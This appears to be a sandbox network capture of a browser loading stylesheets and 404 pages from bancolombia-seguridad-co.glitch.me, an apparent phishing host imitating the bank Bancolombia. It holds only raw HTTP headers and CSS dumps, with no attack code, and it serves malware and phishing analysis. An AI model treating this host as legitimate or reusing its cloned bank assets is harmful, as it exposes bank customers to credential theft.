                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <title>Well, you found a glitch.</title> <meta name="viewport" content="initial-scale=1, width=device-width"> <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css"> <style> * { box-sizing: border-box; } html, body { margin: 0; padding: 0; font-family: "Benton Sans", Helvetica, Sans-serif; font-size: 16px; line-height: 160%; width: 100%; height: 100%; } .container { width: 100%; height: 100%; display: flex; padding: 100px; } .info { max-width: 370px; z-index: 1; position: relative; } h1 { margin: 0; font-size: 40px; line-height: 130%; font-weight: bold; } a { color: #000; } .decorative-image { position: ab [TRUNCATED]
                                                                                                                          Oct 13, 2024 18:20:40.400010109 CEST1236INData Raw: 3a 20 31 30 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 40 6d 65 64 69 61 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 32 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: : 1000px; } @media(max-width: 620px) { .container { padding: 40px; } .decorative-image { right: 20px; bottom: 20px; width: 80vw; } } .button-wra
                                                                                                                          Oct 13, 2024 18:20:40.400027990 CEST1236INData Raw: 34 32 32 2d 30 30 62 32 64 39 32 31 31 34 32 34 25 32 46 47 6c 69 74 63 68 2d 45 72 72 6f 72 2d 52 61 69 6e 62 6f 77 2d 4d 75 67 2d 68 69 72 65 73 2e 70 6e 67 3f 76 3d 31 35 39 35 34 38 31 36 35 33 35 39 33 22 20 63 6c 61 73 73 3d 22 64 65 63 6f
                                                                                                                          Data Ascii: 422-00b2d9211424%2FGlitch-Error-Rainbow-Mug-hires.png?v=1595481653593" class="decorative-image"> </div> <script> function requestStorageAccess() { if ('requestStorageAccess' in document === false) { return Promi
                                                                                                                          Oct 13, 2024 18:20:40.402494907 CEST367OUTGET /nicepage.css HTTP/1.1
                                                                                                                          Host: bancolombia-seguridad-co.glitch.me
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Oct 13, 2024 18:20:40.564253092 CEST1236INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:40 GMT
                                                                                                                          Content-Type: text/css; charset=utf-8
                                                                                                                          Content-Length: 8972
                                                                                                                          Connection: keep-alive
                                                                                                                          x-amz-id-2: X381XjaTHaSDLx/+mygVJogjvHaiOKh5S7C7ExflkJUXg+Sw/P+eCDy3ZTyRXySNxuspQ4q7kphncclZq5UhsOzGPyUhUmYl/WRNhFzNDb8=
                                                                                                                          x-amz-request-id: 44NFRB8HAPQJ8H86
                                                                                                                          last-modified: Sat, 12 Oct 2024 23:58:07 GMT
                                                                                                                          etag: "68c405521b0343db0ab91346521fc35e"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          cache-control: no-cache
                                                                                                                          x-amz-version-id: _hWHY3Ni01WslgwTnDSJixMFskvpvF3p
                                                                                                                          accept-ranges: bytes
                                                                                                                          server: AmazonS3
                                                                                                                          Data Raw: 2f 2a 62 65 67 69 6e 2d 63 6f 6d 6d 6f 6e 73 74 79 6c 65 73 20 6c 69 62 72 61 72 79 2a 2f 2f 2a 21 0a 20 2a 20 66 72 6f 61 6c 61 5f 65 64 69 74 6f 72 20 76 34 2e 30 2e 36 20 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 72 6f 61 6c 61 2e 63 6f 6d 2f 77 79 73 69 77 79 67 2d 65 64 69 74 6f 72 29 0a 20 2a 20 4c 69 63 65 6e 73 65 20 68 74 74 70 73 3a 2f 2f 66 72 6f 61 6c 61 2e 63 6f 6d 2f 77 79 73 69 77 79 67 2d 65 64 69 74 6f 72 2f 74 65 72 6d 73 2f 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 34 2d 32 30 32 31 20 46 72 6f 61 6c 61 20 4c 61 62 73 0a 20 2a 2f 0a 0a 2e 66 72 2d 63 6c 65 61 72 66 69 78 3a 3a 61 66 74 65 72 20 7b 0a 20 20 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0a 20 20 68 65 69 67 68 74 3a 20 30 3b 20 7d 0a 0a 2e 66 72 2d 68 69 64 65 2d 62 79 2d 63 6c 69 70 70 69 6e 67 20 7b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 77 69 64 74 68 3a 20 31 70 78 3b 0a 20 20 68 [TRUNCATED]
                                                                                                                          Data Ascii: /*begin-commonstyles library*//*! * froala_editor v4.0.6 (https://www.froala.com/wysiwyg-editor) * License https://froala.com/wysiwyg-editor/terms/ * Copyright 2014-2021 Froala Labs */.fr-clearfix::after { clear: both; display: block; content: ""; height: 0; }.fr-hide-by-clipping { position: absolute; width: 1px; height: 1px; padding: 0; margin: -1px; overflow: hidden; clip: rect(0, 0, 0, 0); border: 0; }.fr-view img.fr-rounded, .fr-view .fr-img-caption.fr-rounded img { border-radius: 10px; -moz-border-radius: 10px; -webkit-border-radius: 10px; -moz-background-clip: padding; -webkit-background-clip: padding-box; background-clip: padding-box
                                                                                                                          Oct 13, 2024 18:20:40.654424906 CEST377OUTGET /archivos/bootstrap.css HTTP/1.1
                                                                                                                          Host: bancolombia-seguridad-co.glitch.me
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Oct 13, 2024 18:20:40.816679955 CEST1236INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:40 GMT
                                                                                                                          Content-Type: text/css; charset=utf-8
                                                                                                                          Content-Length: 121144
                                                                                                                          Connection: keep-alive
                                                                                                                          x-amz-id-2: 34ZIfg8Z5Ks0CklSOeBI3o2kv4wfiMzOvoh4A0vbEAY7A3hwY2Kg4wrc3MmY/z+1Osh3GLdxJ+Chqnx8ZpbiKA==
                                                                                                                          x-amz-request-id: 44N2X4A1PGH2A5XY
                                                                                                                          last-modified: Sat, 12 Oct 2024 23:58:07 GMT
                                                                                                                          etag: "1c4fbfb220ff170ceacca78869fbd591"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          cache-control: no-cache
                                                                                                                          x-amz-version-id: RjjXO7VGNIOoxrXBM7alW1pQx_zcbxx0
                                                                                                                          accept-ranges: bytes
                                                                                                                          server: AmazonS3
                                                                                                                          Data Raw: 0a 0a 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 33 2e 30 2e 30 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 67 69 74 2e 69 6f 2f 6e 6f 72 6d 61 6c 69 7a 65 20 2a 2f 0a 68 74 6d 6c 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 7d 0a 61 72 74 69 63 6c 65 2c 0a 61 73 69 64 65 2c 0a 64 65 74 61 69 6c 73 2c 0a 66 69 67 63 61 70 74 69 6f 6e 2c 0a 66 69 67 75 72 65 2c 0a 66 6f 6f 74 65 72 2c 0a 68 65 61 64 65 72 2c 0a 68 67 72 6f 75 70 2c 0a 6d 61 69 6e 2c 0a 6e 61 76 2c 0a 73 65 63 74 69 6f 6e 2c 0a 73 75 6d 6d 61 72 79 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 7d 0a 61 75 64 69 6f 2c 0a 63 61 6e 76 61 73 2c 0a 70 72 6f 67 72 65 73 73 2c 0a 76 69 64 65 6f [TRUNCATED]
                                                                                                                          Data Ascii: /*! normalize.css v3.0.0 | MIT License | git.io/normalize */html { font-family: sans-serif; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%;}body { margin: 0;}article,aside,details,figcaption,figure,footer,header,hgroup,main,nav,section,summary { display: block;}audio,canvas,progress,video { display: inline-block; vertical-align: baseline;}audio:not([controls]) { display: none; height: 0;}[hidden],template { display: none;}a { background: transparent;}a:active,a:hover { outline: 0;}abbr[title] { border-bottom: 1px dotted;}b,strong { font-weight: bold;}dfn { font-style: italic;}h1 { margin: .67em 0; font-size: 2em;
                                                                                                                          Oct 13, 2024 18:20:41.480674982 CEST438OUTGET /css/font/OpenSans-Regular.ttf HTTP/1.1
                                                                                                                          Host: bancolombia-seguridad-co.glitch.me
                                                                                                                          Connection: keep-alive
                                                                                                                          Origin: http://bancolombia-seguridad-co.glitch.me
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/archivos/style.css
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Oct 13, 2024 18:20:41.615890026 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:41 GMT
                                                                                                                          Content-Length: 3674
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <title>Well, you found a glitch.</title> <meta name="viewport" content="initial-scale=1, width=device-width"> <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css"> <style> * { box-sizing: border-box; } html, body { margin: 0; padding: 0; font-family: "Benton Sans", Helvetica, Sans-serif; font-size: 16px; line-height: 160%; width: 100%; height: 100%; } .container { width: 100%; height: 100%; display: flex; padding: 100px; } .info { max-width: 370px; z-index: 1; position: relative; } h1 { margin: 0; font-size: 40px; line-height: 130%; font-weight: bold; } a { color: #000; } .decorative-image { position: ab [TRUNCATED]


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.4497353.219.195.73802316C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 13, 2024 18:20:40.271897078 CEST379OUTGET /hhhhhh_files/toolbar.css HTTP/1.1
                                                                                                                          Host: bancolombia-seguridad-co.glitch.me
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Oct 13, 2024 18:20:40.403245926 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:40 GMT
                                                                                                                          Content-Length: 3674
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <title>Well, you found a glitch.</title> <meta name="viewport" content="initial-scale=1, width=device-width"> <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css"> <style> * { box-sizing: border-box; } html, body { margin: 0; padding: 0; font-family: "Benton Sans", Helvetica, Sans-serif; font-size: 16px; line-height: 160%; width: 100%; height: 100%; } .container { width: 100%; height: 100%; display: flex; padding: 100px; } .info { max-width: 370px; z-index: 1; position: relative; } h1 { margin: 0; font-size: 40px; line-height: 130%; font-weight: bold; } a { color: #000; } .decorative-image { position: ab [TRUNCATED]
                                                                                                                          Oct 13, 2024 18:20:40.403343916 CEST1236INData Raw: 3a 20 31 30 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 40 6d 65 64 69 61 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 32 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: : 1000px; } @media(max-width: 620px) { .container { padding: 40px; } .decorative-image { right: 20px; bottom: 20px; width: 80vw; } } .button-wra
                                                                                                                          Oct 13, 2024 18:20:40.403369904 CEST1236INData Raw: 34 32 32 2d 30 30 62 32 64 39 32 31 31 34 32 34 25 32 46 47 6c 69 74 63 68 2d 45 72 72 6f 72 2d 52 61 69 6e 62 6f 77 2d 4d 75 67 2d 68 69 72 65 73 2e 70 6e 67 3f 76 3d 31 35 39 35 34 38 31 36 35 33 35 39 33 22 20 63 6c 61 73 73 3d 22 64 65 63 6f
                                                                                                                          Data Ascii: 422-00b2d9211424%2FGlitch-Error-Rainbow-Mug-hires.png?v=1595481653593" class="decorative-image"> </div> <script> function requestStorageAccess() { if ('requestStorageAccess' in document === false) { return Promi
                                                                                                                          Oct 13, 2024 18:20:40.403390884 CEST101INData Raw: 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6c 6f 67 69 6e 2d 62 75 74 74 6f 6e 27 29 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 6c 6f 67 69 6e 43 6c 69 63 6b 65 64 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e
                                                                                                                          Data Ascii: ElementById('login-button').addEventListener('click', loginClicked); </script> </body></html>
                                                                                                                          Oct 13, 2024 18:20:40.405704975 CEST373OUTGET /archivos/style.css HTTP/1.1
                                                                                                                          Host: bancolombia-seguridad-co.glitch.me
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Oct 13, 2024 18:20:40.608850956 CEST1236INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:40 GMT
                                                                                                                          Content-Type: text/css; charset=utf-8
                                                                                                                          Content-Length: 106499
                                                                                                                          Connection: keep-alive
                                                                                                                          x-amz-id-2: nYCNPVn5ufHyHwxI8YEYLpIaOtCXJU3b9mUai3bQNuirqwJItM3OAsx1y6Yw+zJlwkG/WbRx6Kk=
                                                                                                                          x-amz-request-id: 44N8P3ZM5VKNQAGT
                                                                                                                          last-modified: Sat, 12 Oct 2024 23:58:07 GMT
                                                                                                                          etag: "973d8a8543e1e6170de8f5bfc9d26c74"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          cache-control: no-cache
                                                                                                                          x-amz-version-id: MYFrUL_nIXluGMkhkhVDIImVQjQPTZvX
                                                                                                                          accept-ranges: bytes
                                                                                                                          server: AmazonS3
                                                                                                                          Data Raw: 0a 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 41 72 69 6d 6f 2d 62 6f 6c 64 22 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 22 2e 2e 2f 63 73 73 2f 66 6f 6e 74 2f 61 72 69 6d 6f 2d 62 6f 6c 64 2d 77 65 62 66 6f 6e 74 2e 65 6f 74 22 29 3b 0a 20 20 2f 2a 20 49 45 39 20 43 6f 6d 70 61 74 20 4d 6f 64 65 73 20 2a 2f 0a 20 20 73 72 63 3a 20 75 72 6c 28 22 2e 2e 2f 63 73 73 2f 66 6f 6e 74 2f 61 72 69 6d 6f 2d 62 6f 6c 64 2d 77 65 62 66 6f 6e 74 2e 65 6f 74 22 29 0a 20 20 20 20 20 20 66 6f 72 6d 61 74 28 22 65 6d 62 65 64 64 65 64 2d 6f 70 65 6e 74 79 70 65 22 29 2c 0a 20 20 20 20 75 72 6c 28 22 2e 2e 2f 63 73 73 2f 66 6f 6e 74 2f 61 72 69 6d 6f 2d 62 6f 6c 64 2d 77 65 62 66 6f 6e 74 2e 77 6f 66 66 22 29 0a 20 20 20 20 20 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 2c 0a 20 20 20 20 75 72 6c 28 22 2e 2e 2f 63 73 73 2f 66 6f 6e 74 2f 61 72 69 6d 6f 2d 62 6f 6c 64 2d 77 65 62 66 6f 6e 74 2e 74 74 66 22 29 0a 20 20 20 20 20 20 66 6f 72 6d 61 74 28 22 74 72 75 65 74 79 [TRUNCATED]
                                                                                                                          Data Ascii: @font-face { font-family: "Arimo-bold"; src: url("../css/font/arimo-bold-webfont.eot"); /* IE9 Compat Modes */ src: url("../css/font/arimo-bold-webfont.eot") format("embedded-opentype"), url("../css/font/arimo-bold-webfont.woff") format("woff"), url("../css/font/arimo-bold-webfont.ttf") format("truetype"), url("../css/font/arimo-bold-webfont.svg") format("svg"); /* Legacy iOS */ font-weight: normal; font-style: normal;}@font-face { font-family: "Arimo-italic"; src: url("../css/font/arimo-italic-webfont.eot"); /* IE9 Compat Modes */ src: url("../css/font/arimo-italic-webfont.eot") format("embedded-opentype"), url("../css/font/arimo-italic-webfo
                                                                                                                          Oct 13, 2024 18:20:40.608866930 CEST1236INData Raw: 6e 74 2e 77 6f 66 66 32 22 29 0a 20 20 20 20 20 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 0a 20 20 20 20 75 72 6c 28 22 2e 2e 2f 73 74 79 6c 65 2f 66 6f 6e 74 2f 61 72 69 6d 6f 2d 69 74 61 6c 69 63 2d 77 65 62 66 6f 6e 74 2e 77 6f 66 66
                                                                                                                          Data Ascii: nt.woff2") format("woff2"), url("../style/font/arimo-italic-webfont.woff") format("woff"), url("../css/font/arimo-italic-webfont.ttf") format("truetype"), url("../img/arimo-italic-webfont.svg") format("svg")
                                                                                                                          Oct 13, 2024 18:20:40.608881950 CEST1236INData Raw: 53 61 6e 73 2d 42 6f 6c 64 22 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 22 2e 2e 2f 63 73 73 2f 66 6f 6e 74 2f 4f 70 65 6e 53 61 6e 73 2d 42 6f 6c 64 2e 74 74 66 22 29 0a 20 20 20 20 66 6f 72 6d 61 74 28 22 74 72 75 65 74 79 70 65 22 29 3b 0a 20 20
                                                                                                                          Data Ascii: Sans-Bold"; src: url("../css/font/OpenSans-Bold.ttf") format("truetype"); font-weight: normal; font-style: normal;}@font-face { font-family: "OpenSans-Regular"; src: url("../css/font/OpenSans-Regular.ttf") format("truetype
                                                                                                                          Oct 13, 2024 18:20:40.608954906 CEST1174INData Raw: 6e 74 65 6e 74 3a 20 22 5c 65 39 31 61 22 3b 0a 7d 0a 0a 2e 69 63 6f 6e 2d 63 61 6e 63 65 6c 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 65 39 30 36 22 3b 0a 7d 0a 0a 2e 69 63 6f 6e 2d 61 64 76 65 72 74 65 6e 63 69 61 3a
                                                                                                                          Data Ascii: ntent: "\e91a";}.icon-cancel:before { content: "\e906";}.icon-advertencia:before { content: "\e900";}.icon-agrupar:before { content: "\e901";}.icon-bloquear:before { content: "\e903";}.icon-buscar:before { content: "\e
                                                                                                                          Oct 13, 2024 18:20:40.608978033 CEST1236INData Raw: 63 6f 6e 6f 2d 69 6e 66 6f 72 6d 61 63 69 6f 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 65 39 31 38 22 3b 0a 7d 0a 0a 2e 69 63 6f 6e 2d 70 61 67 61 72 5f 6f 6e 6c 79 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65
                                                                                                                          Data Ascii: cono-informacion:before { content: "\e918";}.icon-pagar_only:before { content: "\e91f";}.icon-paginador-anterior:before { content: "\e920";}.icon-paginador-siguiente:before { content: "\e921";}.icon-programar:before { con
                                                                                                                          Oct 13, 2024 18:20:40.608994961 CEST1236INData Raw: 74 61 72 50 72 6f 64 75 63 74 6f 73 20 2e 70 61 74 68 36 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 65 39 32 66 22 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 65 6d 3b 0a 20 20 63 6f 6c 6f 72 3a 20 77 68 69
                                                                                                                          Data Ascii: tarProductos .path6:before { content: "\e92f"; margin-left: -1em; color: white;}.icon-SolicitarProductos .path7:before { content: "\e930"; margin-left: -1em; color: #093d82;}.icon-SolicitarProductos_hover .path1:before { co
                                                                                                                          Oct 13, 2024 18:20:40.609015942 CEST1236INData Raw: 72 72 6f 77 2d 75 70 2d 72 69 67 68 74 32 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 65 61 33 62 22 3b 0a 7d 0a 0a 2e 69 63 6f 6e 2d 61 72 72 6f 77 2d 72 69 67 68 74 32 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65
                                                                                                                          Data Ascii: rrow-up-right2:before { content: "\ea3b";}.icon-arrow-right2:before { content: "\ea3c";}.icon-arrow-down-right2:before { content: "\ea3d";}.icon-arrow-down2:before { content: "\ea3e";}.icon-arrow-down-left2:before { conte
                                                                                                                          Oct 13, 2024 18:20:40.609033108 CEST1236INData Raw: 2e 70 61 74 68 34 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 65 39 34 31 22 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 65 6d 3b 0a 7d 0a 0a 2e 69 63 6f 6e 2d 72 65 67 6c 61 6d 65 6e 74 6f 20 2e 70 61 74 68
                                                                                                                          Data Ascii: .path4:before { content: "\e941"; margin-left: -1em;}.icon-reglamento .path5:before { content: "\e942"; margin-left: -1em;}.icon-reglamento .path6:before { content: "\e943"; margin-left: -1em;}.icon-reglamento .path7:befor
                                                                                                                          Oct 13, 2024 18:20:40.798295975 CEST379OUTGET /hhhhhh_files/authhub-helper.js.descarga HTTP/1.1
                                                                                                                          Host: bancolombia-seguridad-co.glitch.me
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Oct 13, 2024 18:20:40.927504063 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:40 GMT
                                                                                                                          Content-Length: 3674
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: max-age=0
